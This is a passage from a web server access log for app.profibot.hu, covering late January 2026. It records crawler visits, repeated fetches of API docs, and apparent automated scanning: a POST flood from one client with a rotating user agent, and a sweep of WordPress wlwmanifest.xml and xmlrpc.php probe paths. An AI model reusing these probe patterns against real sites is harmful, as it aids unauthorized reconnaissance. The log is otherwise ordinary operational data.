Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:14 +0000] - 404 404 - POST https app.profibot.hu "/post" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:14 +0000] - 404 404 - POST https app.profibot.hu "/home" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:01:46:19 +0000] - 404 404 - POST https app.profibot.hu "/profile" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:19 +0000] - 404 404 - POST https app.profibot.hu "/profile" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:46:19 +0000] - 404 404 - POST https app.profibot.hu "/profile" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:01:46:19 +0000] - 404 404 - POST https app.profibot.hu "/posts" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:19 +0000] - 404 404 - POST https app.profibot.hu "/profile" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:01:46:19 +0000] - 404 404 - POST https app.profibot.hu "/profile" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:19 +0000] - 404 404 - POST https app.profibot.hu "/blog" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:19 +0000] - 404 404 - POST https app.profibot.hu "/profile" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:19 +0000] - 404 404 - POST https app.profibot.hu "/posts" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:19 +0000] - 404 404 - POST https app.profibot.hu "/posts" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:19 +0000] - 404 404 - POST https app.profibot.hu "/blog" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:46:19 +0000] - 404 404 - POST https app.profibot.hu "/profile" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:19 +0000] - 404 404 - POST https app.profibot.hu "/profile" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:19 +0000] - 404 404 - POST https app.profibot.hu "/home" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:19 +0000] - 404 404 - POST https app.profibot.hu "/posts" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:19 +0000] - 404 404 - POST https app.profibot.hu "/profile" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:46:20 +0000] - 404 404 - POST https app.profibot.hu "/posts" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:20 +0000] - 404 404 - POST https app.profibot.hu "/blog" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:46:20 +0000] - 404 404 - POST https app.profibot.hu "/products" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:20 +0000] - 404 404 - POST https app.profibot.hu "/profile" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:20 +0000] - 404 404 - POST https app.profibot.hu "/search" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:46:20 +0000] - 404 404 - POST https app.profibot.hu "/settings" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:46:20 +0000] - 404 404 - POST https app.profibot.hu "/home" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:46:20 +0000] - 404 404 - POST https app.profibot.hu "/settings" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:46:20 +0000] - 404 404 - POST https app.profibot.hu "/user" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:20 +0000] - 404 404 - POST https app.profibot.hu "/settings" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:20 +0000] - 404 404 - POST https app.profibot.hu "/settings" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:20 +0000] - 404 404 - POST https app.profibot.hu "/users" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:46:20 +0000] - 404 404 - POST https app.profibot.hu "/profile" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:20 +0000] - 404 404 - POST https app.profibot.hu "/search" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:46:20 +0000] - 404 404 - POST https app.profibot.hu "/posts" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:20 +0000] - 404 404 - POST https app.profibot.hu "/profile" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:20 +0000] - 404 404 - POST https app.profibot.hu "/blog" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:46:20 +0000] - 404 404 - POST https app.profibot.hu "/shop" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:20 +0000] - 404 404 - POST https app.profibot.hu "/profile" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:20 +0000] - 404 404 - POST https app.profibot.hu "/cart" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:46:20 +0000] - 404 404 - POST https app.profibot.hu "/users" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:46:20 +0000] - 404 404 - POST https app.profibot.hu "/contact" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:46:20 +0000] - 404 404 - POST https app.profibot.hu "/cart" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:20 +0000] - 404 404 - POST https app.profibot.hu "/search" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:20 +0000] - 404 404 - POST https app.profibot.hu "/settings" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:46:20 +0000] - 404 404 - POST https app.profibot.hu "/product" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:46:20 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/signout" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:46:20 +0000] - 404 404 - POST https app.profibot.hu "/home" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:20 +0000] - 404 404 - POST https app.profibot.hu "/product" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:02:40:16 +0000] - 404 404 - GET https app.profibot.hu "/robots.txt" [Client 74.7.175.153] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[28/Jan/2026:02:40:16 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 74.7.243.208] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-" +[28/Jan/2026:03:17:58 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 23.27.145.90] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[28/Jan/2026:03:48:00 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 23.27.145.79] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[28/Jan/2026:08:21:56 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 34.69.37.120] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[28/Jan/2026:08:21:56 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 34.69.37.120] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[28/Jan/2026:08:21:56 +0000] - 404 404 - GET http app.profibot.hu "/wp-includes/wlwmanifest.xml" [Client 34.69.37.120] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[28/Jan/2026:08:21:56 +0000] - 404 404 - GET http app.profibot.hu "/xmlrpc.php?rsd" [Client 34.69.37.120] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[28/Jan/2026:08:21:56 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 34.69.37.120] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[28/Jan/2026:08:21:57 +0000] - 404 404 - GET http app.profibot.hu "/blog/wp-includes/wlwmanifest.xml" [Client 34.69.37.120] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[28/Jan/2026:08:21:57 +0000] - 404 404 - GET http app.profibot.hu "/web/wp-includes/wlwmanifest.xml" [Client 34.69.37.120] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[28/Jan/2026:08:21:57 +0000] - 404 404 - GET http app.profibot.hu "/wordpress/wp-includes/wlwmanifest.xml" [Client 34.69.37.120] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[28/Jan/2026:08:21:57 +0000] - 404 404 - GET http app.profibot.hu "/website/wp-includes/wlwmanifest.xml" [Client 34.69.37.120] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[28/Jan/2026:08:21:57 +0000] - 404 404 - GET http app.profibot.hu "/wp/wp-includes/wlwmanifest.xml" [Client 34.69.37.120] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[28/Jan/2026:08:21:57 +0000] - 404 404 - GET http app.profibot.hu "/news/wp-includes/wlwmanifest.xml" [Client 34.69.37.120] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[28/Jan/2026:08:21:57 +0000] - 404 404 - GET http app.profibot.hu "/2018/wp-includes/wlwmanifest.xml" [Client 34.69.37.120] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[28/Jan/2026:08:21:58 +0000] - 404 404 - GET http app.profibot.hu "/2019/wp-includes/wlwmanifest.xml" [Client 34.69.37.120] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[28/Jan/2026:08:21:58 +0000] - 404 404 - GET http app.profibot.hu "/shop/wp-includes/wlwmanifest.xml" [Client 34.69.37.120] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[28/Jan/2026:08:21:58 +0000] - 404 404 - GET http app.profibot.hu "/wp1/wp-includes/wlwmanifest.xml" [Client 34.69.37.120] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[28/Jan/2026:08:21:58 +0000] - 404 404 - GET http app.profibot.hu "/test/wp-includes/wlwmanifest.xml" [Client 34.69.37.120] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[28/Jan/2026:08:21:58 +0000] - 404 404 - GET http app.profibot.hu "/media/wp-includes/wlwmanifest.xml" [Client 34.69.37.120] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[28/Jan/2026:08:21:58 +0000] - 404 404 - GET http app.profibot.hu "/wp2/wp-includes/wlwmanifest.xml" [Client 34.69.37.120] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[28/Jan/2026:08:21:58 +0000] - 404 404 - GET http app.profibot.hu "/site/wp-includes/wlwmanifest.xml" [Client 34.69.37.120] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[28/Jan/2026:08:21:58 +0000] - 404 404 - GET http app.profibot.hu "/cms/wp-includes/wlwmanifest.xml" [Client 34.69.37.120] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[28/Jan/2026:08:21:59 +0000] - 404 404 - GET http app.profibot.hu "/sito/wp-includes/wlwmanifest.xml" [Client 34.69.37.120] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[28/Jan/2026:09:25:55 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 84.1.26.27] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[28/Jan/2026:09:25:56 +0000] - 404 404 - GET https app.profibot.hu "/favicon.ico" [Client 84.1.26.27] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://app.profibot.hu/" +[28/Jan/2026:09:26:03 +0000] - 200 200 - GET https app.profibot.hu "/docs" [Client 84.1.26.27] [Length 517] [Gzip 1.90] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[28/Jan/2026:09:26:03 +0000] - 200 200 - GET https app.profibot.hu "/api/v2/openapi.json" [Client 84.1.26.27] [Length 7703] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://app.profibot.hu/docs" +[28/Jan/2026:11:40:39 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 54.162.31.194] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" "-" +[28/Jan/2026:16:12:50 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 44.196.29.182] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 clst-pab" "-" +[29/Jan/2026:05:54:09 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 34.126.179.78] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0 Safari/537.36" "-" +[29/Jan/2026:05:54:10 +0000] - 404 404 - GET http app.profibot.hu "/wordpress/" [Client 34.126.179.78] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" +[29/Jan/2026:13:01:46 +0000] - 200 200 - GET http app.profibot.hu "/docs" [Client 84.1.26.27] [Length 517] [Gzip 1.90] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:13:01:46 +0000] - 200 200 - GET http app.profibot.hu "/api/v2/openapi.json" [Client 84.1.26.27] [Length 8209] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "http://app.profibot.hu/docs" +[29/Jan/2026:13:06:53 +0000] - 200 200 - GET http app.profibot.hu "/docs" [Client 84.1.26.27] [Length 517] [Gzip 1.90] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:13:06:54 +0000] - 200 200 - GET http app.profibot.hu "/api/v2/openapi.json" [Client 84.1.26.27] [Length 8209] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "http://app.profibot.hu/docs" +[29/Jan/2026:13:08:01 +0000] - - 502 - GET http app.profibot.hu "/docs" [Client 84.1.26.27] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:13:08:01 +0000] - - 502 - GET http app.profibot.hu "/favicon.ico" [Client 84.1.26.27] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "http://app.profibot.hu/docs" +[29/Jan/2026:13:22:12 +0000] - - 502 - GET http app.profibot.hu "/docs" [Client 84.1.26.27] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:13:22:12 +0000] - - 502 - GET http app.profibot.hu "/favicon.ico" [Client 84.1.26.27] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "http://app.profibot.hu/docs" +[29/Jan/2026:13:25:33 +0000] - 200 200 - GET http app.profibot.hu "/docs" [Client 84.1.26.27] [Length 517] [Gzip 1.90] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:13:25:33 +0000] - 200 200 - GET http app.profibot.hu "/api/v2/openapi.json" [Client 84.1.26.27] [Length 9930] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "http://app.profibot.hu/docs" +[29/Jan/2026:13:36:43 +0000] - 200 200 - GET http app.profibot.hu "/docs" [Client 84.1.26.27] [Length 517] [Gzip 1.90] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:13:36:43 +0000] - 200 200 - GET http app.profibot.hu "/api/v2/openapi.json" [Client 84.1.26.27] [Length 9930] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "http://app.profibot.hu/docs" +[29/Jan/2026:13:51:56 +0000] - 200 200 - GET http app.profibot.hu "/docs" [Client 84.1.26.27] [Length 517] [Gzip 1.90] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 